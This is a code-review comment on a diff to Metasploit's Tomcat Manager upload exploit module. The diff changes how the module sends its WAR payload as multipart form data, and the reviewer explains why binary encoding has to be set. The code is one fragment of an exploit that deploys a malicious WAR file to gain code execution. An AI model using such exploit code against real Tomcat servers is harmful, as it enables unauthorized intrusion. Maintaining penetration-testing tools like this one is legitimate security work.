modules/exploits/multi/http/tomcat_mgr_upload.rb

```diff
@@ -320,20 +305,25 @@ def war_payload
   end
 
   def send_war_payload(url, war)
-    boundary_identifier = rand_text_numeric(28)
-
     res = send_request_cgi({
       'uri'          => url,
       'method'       => 'POST',
-      'ctype'        => 'multipart/form-data; boundary=---------------------------' + boundary_identifier,
       'user'         => datastore['HttpUsername'],
       'password'     => datastore['HttpPassword'],
       'cookie'       => @session_id,
       'vars_get'     => vars_get,
-      'data'         => generate_multipart_msg(boundary_identifier, war),
+      'vars_form_data' => [
+        {
+          'name' => 'deployWar',
+          'filename' => "#{@app_base}.war",
+          'content_type' => 'application/octet-stream',
+          'data' => war,
+          'encoding' => 'binary'
```

Comment:
It turns out that setting binary encoding here explicitly is required here to stop this weird force line logic happening; 

https://github.com/rapid7/rex-mime/blob/3899067307a112d7787ea8ac21c60fbbc6fdef56/lib/rex/mime/part.rb#L22-L28

It's out of scope to to this for now, but it's certainly unexpected behavior


https://github.com/rapid7/rex-mime/blob/3899067307a112d7787ea8ac21c60fbbc6fdef56/lib/rex/mime/encoding.rb#L7-L13